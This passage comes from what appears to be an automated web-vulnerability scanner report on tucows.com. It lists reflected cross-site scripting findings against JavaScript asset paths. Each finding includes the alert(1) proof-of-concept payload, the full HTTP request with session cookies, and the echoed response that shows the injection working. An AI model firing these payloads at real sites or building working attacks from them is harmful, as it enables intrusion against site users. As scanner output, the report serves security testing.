Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css?5be67"-alert(1)-"26a6c055dc5=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.25. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41642"-alert(1)-"3787a403d76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images41642"-alert(1)-"3787a403d76/newassets/includes/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images41642"-alert(1)-"3787a403d76/newassets/includes/js/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.26. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7b02"-alert(1)-"7b6e920b807 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetsf7b02"-alert(1)-"7b6e920b807/includes/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetsf7b02"-alert(1)-"7b6e920b807/includes/js/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.27. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56eb6"-alert(1)-"cf82ccc0327 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes56eb6"-alert(1)-"cf82ccc0327/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes56eb6"-alert(1)-"cf82ccc0327/js/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.28. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22c99"-alert(1)-"55fa4663456 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js22c99"-alert(1)-"55fa4663456/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js22c99"-alert(1)-"55fa4663456/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.29. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c02"-alert(1)-"c3378b8f5df was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/aalib.js51c02"-alert(1)-"c3378b8f5df HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/aalib.js51c02"-alert(1)-"c3378b8f5df";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.30. http://www.tucows.com/images/newassets/includes/js/aalib.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85680"-alert(1)-"13364046c33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/aalib.js?85680"-alert(1)-"13364046c33=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/aalib.js?85680"-alert(1)-"13364046c33=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.31. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1638"-alert(1)-"93eb7715e1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagese1638"-alert(1)-"93eb7715e1d/newassets/includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagese1638"-alert(1)-"93eb7715e1d/newassets/includes/js/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.32. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94b97"-alert(1)-"7385601d3b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets94b97"-alert(1)-"7385601d3b4/includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets94b97"-alert(1)-"7385601d3b4/includes/js/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.33. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5955"-alert(1)-"19d51f958d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includesc5955"-alert(1)-"19d51f958d8/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includesc5955"-alert(1)-"19d51f958d8/js/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.34. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0d6e"-alert(1)-"900705e6011 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/jsf0d6e"-alert(1)-"900705e6011/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/jsf0d6e"-alert(1)-"900705e6011/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.35. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

